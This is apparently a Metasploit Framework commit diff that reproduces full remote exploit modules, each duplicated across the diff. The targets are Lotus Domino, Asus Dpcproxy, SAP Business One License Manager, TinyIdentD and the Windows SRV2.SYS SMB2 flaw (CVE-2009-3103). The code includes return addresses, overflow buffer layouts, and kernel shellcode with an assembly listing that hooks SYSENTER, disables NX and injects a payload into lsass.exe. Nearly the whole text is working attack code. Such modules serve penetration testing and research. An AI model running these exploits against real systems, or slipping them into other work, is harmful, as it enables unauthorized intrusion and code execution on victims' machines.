'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll
'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
}
],
['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
{
'FixESP' => 0x7ea0615c, # add esp, 0x324, ret @net.dll
'JmpESP' => 0x6391071e, # jmp esp @nlsccstr.dll
}
],
],
'DisclosureDate' => 'May 20 2008'))
register_options( [ Opt::RPORT(80) ], self.class )
end
def exploit
connect
lang = rand_text_alphanumeric(116) # greetz to hateful chris
lang[ 56, 4 ] = [ 0xfffffffe ].pack('V') # Fix Second crash (esi)
lang[ 68, 4 ] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax)
lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V') # Fix First crash
lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1
lang << "\x00"
lang << payload.encoded
if(not target['DisableNX'])
lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string # 4
lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2
lang[ 84, 2 ] = Rex::Arch::X86.jmp_short(-0x46) # 3 jmp back to top
else
lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string # 8
lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2
lang[ 84, 4 ] = [target['FixEBP']].pack('V') # 3
lang[ 88, 4 ] = [target['Ret']].pack('V') # 4
lang[ 92, 4 ] = [target['JmpESP']].pack('V') # 6
lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top
lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5
end
uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1) # Trigger
print_status("Trying target #{target.name}...")
send_request_raw({
'uri' => "#{uri}",
'method' => 'GET',
'headers' =>
{
'Accept' => '*/*',
'Accept-Language' => "#{lang}",
'Accept-Encoding' => 'gzip,deflate',
'Keep-Alive' => '300',
'Connection' => 'keep-alive',
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
}
}, 5)
handler
disconnect
end
end

142
modules/exploits/windows/misc/asus_dpcproxy_overflow.rb
View File

@ -1,75 +1,75 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Asus Dpcproxy Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Asus Dpcroxy version 2.0.0.19.
It should be vulnerable until version 2.0.0.24.
Credit to Luigi Auriemma
},
'Author' => 'Jacopo Cervini',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-1491' ],
[ 'OSVDB', '43638' ],
[ 'BID', '28394' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x07\x08\x0d\x0e\x0f\x7e\x7f\xff",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Asus Dpcroxy version 2.00.19 Universal', { 'Ret' => 0x0040273b } ], # p/p/r
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'March 21 2008'))
register_options([Opt::RPORT(623)], self.class)
end
def exploit
connect
sploit = make_nops(0x38a - payload.encoded.length)+ payload.encoded + rand_text_english(6032)
sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2)
sploit << [target.ret].pack('V') + make_nops(8) + Metasm::Shellcode.assemble(Metasm::Ia32.new, "add bh,6 add bh,6 add bh,2 push ebx ret").encode_string #jmp back
sploit << make_nops(50)
print_status("Trying target #{target.name}...")
sock.put(sploit)
sleep(3) # =(
handler
disconnect
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Asus Dpcproxy Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Asus Dpcroxy version 2.0.0.19.
It should be vulnerable until version 2.0.0.24.
Credit to Luigi Auriemma
},
'Author' => 'Jacopo Cervini',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-1491' ],
[ 'OSVDB', '43638' ],
[ 'BID', '28394' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x07\x08\x0d\x0e\x0f\x7e\x7f\xff",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Asus Dpcroxy version 2.00.19 Universal', { 'Ret' => 0x0040273b } ], # p/p/r
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'March 21 2008'))
register_options([Opt::RPORT(623)], self.class)
end
def exploit
connect
sploit = make_nops(0x38a - payload.encoded.length)+ payload.encoded + rand_text_english(6032)
sploit << Rex::Arch::X86.jmp_short(6) + make_nops(2)
sploit << [target.ret].pack('V') + make_nops(8) + Metasm::Shellcode.assemble(Metasm::Ia32.new, "add bh,6 add bh,6 add bh,2 push ebx ret").encode_string #jmp back
sploit << make_nops(50)
print_status("Trying target #{target.name}...")
sock.put(sploit)
sleep(3) # =(
handler
disconnect
end
end

154
modules/exploits/windows/misc/sap_2005_license.rb
View File

@ -1,78 +1,78 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP Business One License Manager 2005 Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the SAP Business One 2005
License Manager 'NT Naming Service' A and B releases. By sending an
excessively long string the stack is overwritten enabling arbitrary
code execution.
},
'Author' => 'Jacopo Cervini',
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '56837' ],
[ 'BID', '35933' ],
[ 'URL', 'http://www.milw0rm.com/exploits/9319' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# patrickw tested OK w2k3sp2 20090910
[ 'Sap Business One 2005 B1 Universal', { 'Ret' => 0x00547b82 } ], # tao2005.dll push esp /ret
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 1 2009'))
register_options([Opt::RPORT(30000)], self.class)
end
def exploit
connect
sploit = "\x47\x49\x4f\x50\x01\x00\x01\x00" + rand_text_english(1024)
sploit << [target.ret].pack('V') # EIP for w2k3sp2 - jacopo (1024)
sploit << [target.ret].pack('V') # EIP for w2k3sp0 - patrickw (1028)
sploit << make_nops(44) + payload.encoded + make_nops(384)
print_status("Trying target #{target.name}...")
sock.put(sploit)
sleep(1)
handler
disconnect
end
end
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP Business One License Manager 2005 Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the SAP Business One 2005
License Manager 'NT Naming Service' A and B releases. By sending an
excessively long string the stack is overwritten enabling arbitrary
code execution.
},
'Author' => 'Jacopo Cervini',
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '56837' ],
[ 'BID', '35933' ],
[ 'URL', 'http://www.milw0rm.com/exploits/9319' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# patrickw tested OK w2k3sp2 20090910
[ 'Sap Business One 2005 B1 Universal', { 'Ret' => 0x00547b82 } ], # tao2005.dll push esp /ret
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 1 2009'))
register_options([Opt::RPORT(30000)], self.class)
end
def exploit
connect
sploit = "\x47\x49\x4f\x50\x01\x00\x01\x00" + rand_text_english(1024)
sploit << [target.ret].pack('V') # EIP for w2k3sp2 - jacopo (1024)
sploit << [target.ret].pack('V') # EIP for w2k3sp0 - patrickw (1028)
sploit << make_nops(44) + payload.encoded + make_nops(384)
print_status("Trying target #{target.name}...")
sock.put(sploit)
sleep(1)
handler
disconnect
end
end

142
modules/exploits/windows/misc/tiny_identd_overflow.rb
View File

@ -1,77 +1,77 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'TinyIdentD 2.2 Stack Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in TinyIdentD version 2.2.
If we send a long string to the ident service we can overwrite the return
address and execute arbitrary code. Credit to Maarten Boone.
},
'Author' => 'Jacopo Cervini <acaro[at]jervus.it>',
'Version' => '$Revision$',
'References' =>
[
def initialize(info = {})
super(update_info(info,
'Name' => 'TinyIdentD 2.2 Stack Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in TinyIdentD version 2.2.
If we send a long string to the ident service we can overwrite the return
address and execute arbitrary code. Credit to Maarten Boone.
},
'Author' => 'Jacopo Cervini <acaro[at]jervus.it>',
'Version' => '$Revision$',
'References' =>
[
['CVE', '2007-2711'],
['OSVDB', '36053'],
['BID', '23981'],
],
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0d\x20\x0a"
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 Server SP4 English', { 'Ret' => 0x7c2d15e7, } ], # call esi
['Windows XP SP2 Italian', { 'Ret' => 0x77f46eda, } ], # call esi
],
'Privileged' => false,
'DisclosureDate' => 'May 14 2007'
))
register_options([ Opt::RPORT(113) ], self.class)
end
def exploit
connect
pattern = "\xeb\x20"+", 28 : USERID : UNIX :";
pattern << make_nops(0x1eb - payload.encoded.length)
pattern << payload.encoded
pattern << [ target.ret ].pack('V')
request = pattern + "\n"
print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...")
sock.put(request)
handler
disconnect
end
['BID', '23981'],
],
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0d\x20\x0a"
},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 Server SP4 English', { 'Ret' => 0x7c2d15e7, } ], # call esi
['Windows XP SP2 Italian', { 'Ret' => 0x77f46eda, } ], # call esi
],
'Privileged' => false,
'DisclosureDate' => 'May 14 2007'
))
register_options([ Opt::RPORT(113) ], self.class)
end
def exploit
connect
pattern = "\xeb\x20"+", 28 : USERID : UNIX :";
pattern << make_nops(0x1eb - payload.encoded.length)
pattern << payload.encoded
pattern << [ target.ret ].pack('V')
request = pattern + "\n"
print_status("Trying #{target.name} using address at #{"0x%.8x" % target.ret }...")
sock.put(request)
handler
disconnect
end
end

628
modules/exploits/windows/smb/smb2_negotiate_func_index.rb
View File

@ -1,315 +1,315 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
'Description' => %q{
This module exploits an out of bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista
without SP1 does not seem affected by this flaw.
},
'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2009-3103'],
['BID', '36299'],
['OSVDB', '57799'],
['URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html'],
['URL', 'http://www.microsoft.com/technet/security/advisory/975497.mspx']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'StackAdjustment' => -3500,
'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::Raw,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Vista SP1/SP2 and Server 2008 (x86)',
{
'Platform' => 'win',
'Arch' => [ ARCH_X86 ],
'Ret' => 0xFFD00D09, # "POP ESI; RET" from the kernels HAL memory region ...no ASLR :)
'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).
'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer
'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0
}
],
],
'DefaultTarget' => 0
))
register_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true, "The number of seconds to wait for the attack to complete.", 180 ] ) ], self.class )
end
# Not reliable enough for automation yet
def autofilter
false
end
# The payload works as follows:
# * Our sysenter handler and ring3 stagers are copied over to safe location.
# * The SYSENTER_EIP_MSR is patched to point to our sysenter handler.
# * The srv2.sys thread we are in is placed in a halted state.
# * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control.
# * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met.
# * If NX is enabled we patch the respective page table entry to disable it for the ring3 code.
# * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager.
# * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called.
def ring0_x86_payload( opts = {} )
# The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static).
pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00
# The address in kernel memory where we place our ring0 and ring3 stager (no ASLR).
kstager = opts['StagerAddressKernel'] || 0xFFDF0400
# The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR).
ustager = opts['StagerAddressUser'] || 0x7FFE0400
# Target SYSTEM process to inject ring3 payload into.
process = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*')
# A simple hash of the process name based on the first 4 wide chars.
# Assumes process is located at '*:\windows\system32\'. (From Rex::Payloads::Win32::Kernel::Stager)
checksum = process[0] + ( process[2] << 8 ) + ( process[1] << 16 ) + ( process[3] << 24 )
# The ring0 -> ring3 payload blob. Full assembly listing given below.
r0 = "\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +
"\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
"\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
"\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
"\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +
"\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +
"\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
"\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +
"\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +
"\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +
"\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +
"\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +
"\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
# Patch in the required values.
r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + payload.encoded.length - 0x1C ) ].pack("V") )
r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") )
r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") )
r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") )
r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") )
# Return the ring0 -> ring3 payload blob with the real ring3 payload appended.
return r0 + payload.encoded
end
def exploit
print_status( "Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})..." )
connect
# we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest
# and srv2!SrvProcPartialCompleteCompoundedRequest
dialects = [ [ target['ReadAddress'] ].pack("V") * 25, "SMB 2.002" ]
data = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
data += [ 0x00000000 ].pack("V") * 37 # Must be NULL's
data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)
data += [ 0xFFFFFFFF ].pack("V") # Used in srv2!SrvConsumeDataAndComplete2+0x34
data += [ 0x42424242 ].pack("V") * 7 # Unused
data += [ target['MagicIndex'] ].pack("V") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)
data += [ 0x41414141 ].pack("V") * 6 # Unused
data += [ target.ret ].pack("V") # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2
data += ring0_x86_payload( target['PayloadOptions'] || {} ) # Our ring0 -> ring3 shellcode
# We gain code execution by returning into the SMB packet, begining with its header.
# The SMB packets Magic Header value is 0xFF534D42 which assembles to "CALL DWORD PTR [EBX+0x4D]; INC EDX"
# This will cause an access violation if executed as we can never set EBX to a valid pointer.
# To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.
# This assembles to "ADD BYTE PTR [EBP+ECX*2+0x42], DL" which is fine as ECX will be zero and EBP is a vaild pointer.
# We patch the Signature1 value to be a jump forward into our shellcode.
packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
packet['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
packet['Payload']['SMB'].v['Flags1'] = 0x18
packet['Payload']['SMB'].v['Flags2'] = 0xC853
packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']
packet['Payload']['SMB'].v['Signature1'] = 0x0158E900 # "JMP DWORD 0x15D" ; jump into our ring0 payload.
packet['Payload']['SMB'].v['Signature2'] = 0x00000000 # ...
packet['Payload']['SMB'].v['MultiplexID'] = rand( 0x10000 )
packet['Payload'].v['Payload'] = data
packet = packet.to_s
print_status( "Sending the exploit packet (#{packet.length} bytes)..." )
sock.put( packet )
wtime = datastore['WAIT'].to_i
print_status( "Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger..." )
stime = Time.now.to_i
poke_logins = %W{Guest Administrator}
poke_logins.each do |login|
begin
sec = connect(false)
sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))
rescue ::Exception => e
sec.socket.close
end
end
while( stime + wtime > Time.now.to_i )
select(nil, nil, nil, 0.25)
break if session_created?
end
handler
disconnect
end
end
=begin
;===================================================================================
; sf
; Recommended Reading: Kernel-mode Payloads on Windows, 2005, bugcheck & skape.
; http://www.uninformed.org/?v=3&a=4&t=sumry
;===================================================================================
[bits 32]
[org 0]
;===================================================================================
ring0_migrate_start:
cld
cli
jmp short ring0_migrate_bounce ; jump to bounce to get ring0_stager_start address
ring0_migrate_patch:
pop esi ; pop off ring0_stager_start address
; get current sysenter msr (nt!KiFastCallEntry)
push 0x176 ; SYSENTER_EIP_MSR
pop ecx
rdmsr
; save origional sysenter msr (nt!KiFastCallEntry)
mov dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 0 ], eax
; retrieve the address in kernel memory where we will write the ring0 stager + ring3 code
mov edi, dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 4 ]
; patch sysenter msr to be our stager
mov eax, edi
wrmsr
; copy over stager to shared memory
mov ecx, 0x41414141 ; ( ring3_stager - ring0_stager_start + length(ring3_stager) )
rep movsb
sti ; set interrupt flag
; Halt this thread to avoid problems.
ring0_migrate_idle:
hlt
jmp short ring0_migrate_idle
ring0_migrate_bounce:
call ring0_migrate_patch ; call the patch code, pushing the ring0_stager_start address to stack
;===================================================================================
; This stager will now get called every time a ring3 process issues a sysenter
ring0_stager_start:
push byte 0 ; alloc a dword for the patched return address
pushfd ; save flags and registers
pushad
call ring0_stager_eip
ring0_stager_eip:
pop eax
; patch in the real nt!KiFastCallEntry address as our return address
mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 0 ]
mov [ esp + 36 ], ebx
; see if we are being told to remove our sysenter hook...
cmp ecx, 0xDEADC0DE
jne ring0_stager_hook
push 0x176 ; SYSENTER_EIP_MSR
pop ecx
mov eax, ebx ; set the sysenter msr to be the real nt!KiFastCallEntry address
xor edx, edx
wrmsr
xor eax, eax ; clear eax (the syscall number) so we can continue
jmp short ring0_stager_finish
ring0_stager_hook:
; get the origional r3 return address (edx is the ring3 stack pointer)
mov esi, [ edx ]
; determine if the return is to a "ret" instruction
movzx ebx, byte [ esi ]
cmp bx, 0xC3
; only insert our ring3 stager hook if we are to return to a single ret (for stability).
jne short ring0_stager_finish
; calculate our r3 address in shared memory
mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 8 ]
lea ebx, [ ebx + ring3_start - ring0_stager_start ]
; patch in our r3 stage as the r3 return address
mov [ edx ], ebx
; detect if NX is present (clobbers eax,ebx,ecx,edx)...
mov eax, 0x80000001
cpuid
and edx, 0x00100000 ; bit 20 is the NX bit
jz short ring0_stager_finish
; modify the correct page table entry to make our ring3 stager executable
mov edx, 0x45454545 ; we default to 0xC03FFF00 this for now (should calculate dynamically).
add edx, 4
and dword [ edx ], 0x7FFFFFFF ; clear the NX bit
; finish up by returning into the real KiFastCallEntry and then returning into our ring3 code (if hook was set).
ring0_stager_finish:
popad ; restore registers
popfd ; restore flags
ret ; return to real nt!KiFastCallEntry
ring0_stager_data:
dd 0xFFFFFFFF ; saved nt!KiFastCallEntry
dd 0x42424242 ; kernel memory address of stager (default to 0xFFDF0400)
dd 0x43434343 ; shared user memory address of stager (default to 0x7FFE0400)
;===================================================================================
ring3_start:
pushad
push byte 0x30
pop eax
cdq ; zero edx
mov ebx, [ fs : eax ] ; get the PEB
cmp [ ebx + 0xC ], edx
jz ring3_finish
mov eax, [ ebx + 0x10 ] ; get pointer to the ProcessParameters (_RTL_USER_PROCESS_PARAMETERS)
mov eax, [ eax + 0x3C ] ; get the current processes ImagePathName (unicode string)
add eax, byte 0x28 ; advance past '*:\windows\system32\' (we assume this as we want a system process).
mov ecx, [ eax ] ; compute a simple hash of the name. get first 2 wide chars of name 'l\x00s\x00'
add ecx, [ eax + 0x3 ] ; and add '\x00a\x00s'
cmp ecx, 0x44444444 ; check the hash (default to hash('lsass.exe') == 0x7373616C)
jne ring3_finish ; if we are not currently in the correct process, return to real caller
call ring3_cleanup ; otherwise we first remove our ring0 sysenter hook
call ring3_stager ; and then call the real ring3 payload
jmp ring3_finish ; should the payload return we can resume this thread correclty.
ring3_cleanup:
mov ecx, 0xDEADC0DE ; set the magic value for ecx
mov edx, esp ; save our esp in edx for sysenter
sysenter ; now sysenter into ring0 to remove the sysenter hook (return to ring3_cleanup's caller).
ring3_finish:
popad
ret ; return to the origional system calls caller
;===================================================================================
ring3_stager:
; ...ring3 stager here...
;===================================================================================
=end
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
'Description' => %q{
This module exploits an out of bounds function table dereference in the SMB
request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista
without SP1 does not seem affected by this flaw.
},
'Author' => [ 'laurent.gaffie[at]gmail.com', 'hdm', 'sf' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2009-3103'],
['BID', '36299'],
['OSVDB', '57799'],
['URL', 'http://seclists.org/fulldisclosure/2009/Sep/0039.html'],
['URL', 'http://www.microsoft.com/technet/security/advisory/975497.mspx']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'StackAdjustment' => -3500,
'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::Raw,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Vista SP1/SP2 and Server 2008 (x86)',
{
'Platform' => 'win',
'Arch' => [ ARCH_X86 ],
'Ret' => 0xFFD00D09, # "POP ESI; RET" from the kernels HAL memory region ...no ASLR :)
'ReadAddress' => 0xFFDF0D04, # A readable address from kernel space (no nulls in address).
'ProcessIDHigh' => 0x0217, # srv2!SrvSnapShotScavengerTimer
'MagicIndex' => 0x3FFFFFB4, # (DWORD)( MagicIndex*4 + 0x130 ) == 0
}
],
],
'DefaultTarget' => 0
))
register_options( [ Opt::RPORT(445), OptInt.new( 'WAIT', [ true, "The number of seconds to wait for the attack to complete.", 180 ] ) ], self.class )
end
# Not reliable enough for automation yet
def autofilter
false
end
# The payload works as follows:
# * Our sysenter handler and ring3 stagers are copied over to safe location.
# * The SYSENTER_EIP_MSR is patched to point to our sysenter handler.
# * The srv2.sys thread we are in is placed in a halted state.
# * Upon any ring3 proces issuing a sysenter command our ring0 sysenter handler gets control.
# * The ring3 return address is modified to force our ring3 stub to be called if certain conditions met.
# * If NX is enabled we patch the respective page table entry to disable it for the ring3 code.
# * Control is passed to real sysenter handler, upon the real sysenter handler finishing, sysexit will return to our ring3 stager.
# * If the ring3 stager is executing in the desired process our sysenter handler is removed and the real ring3 payload called.
def ring0_x86_payload( opts = {} )
# The page table entry for StagerAddressUser, used to bypass NX in ring3 on PAE enabled systems (should be static).
pagetable = opts['StagerAddressPageTable'] || 0xC03FFF00
# The address in kernel memory where we place our ring0 and ring3 stager (no ASLR).
kstager = opts['StagerAddressKernel'] || 0xFFDF0400
# The address in shared memory (addressable from ring3) where we can find our ring3 stager (no ASLR).
ustager = opts['StagerAddressUser'] || 0x7FFE0400
# Target SYSTEM process to inject ring3 payload into.
process = (opts['RunInWin32Process'] || 'lsass.exe').unpack('C*')
# A simple hash of the process name based on the first 4 wide chars.
# Assumes process is located at '*:\windows\system32\'. (From Rex::Payloads::Win32::Kernel::Stager)
checksum = process[0] + ( process[2] << 8 ) + ( process[1] << 16 ) + ( process[3] << 24 )
# The ring0 -> ring3 payload blob. Full assembly listing given below.
r0 = "\xFC\xFA\xEB\x1E\x5E\x68\x76\x01\x00\x00\x59\x0F\x32\x89\x46\x60" +
"\x8B\x7E\x64\x89\xF8\x0F\x30\xB9\x41\x41\x41\x41\xF3\xA4\xFB\xF4" +
"\xEB\xFD\xE8\xDD\xFF\xFF\xFF\x6A\x00\x9C\x60\xE8\x00\x00\x00\x00" +
"\x58\x8B\x58\x57\x89\x5C\x24\x24\x81\xF9\xDE\xC0\xAD\xDE\x75\x10" +
"\x68\x76\x01\x00\x00\x59\x89\xD8\x31\xD2\x0F\x30\x31\xC0\xEB\x34" +
"\x8B\x32\x0F\xB6\x1E\x66\x81\xFB\xC3\x00\x75\x28\x8B\x58\x5F\x8D" +
"\x5B\x6C\x89\x1A\xB8\x01\x00\x00\x80\x0F\xA2\x81\xE2\x00\x00\x10" +
"\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +
"\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +
"\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +
"\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +
"\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +
"\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
# Patch in the required values.
r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + payload.encoded.length - 0x1C ) ].pack("V") )
r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") )
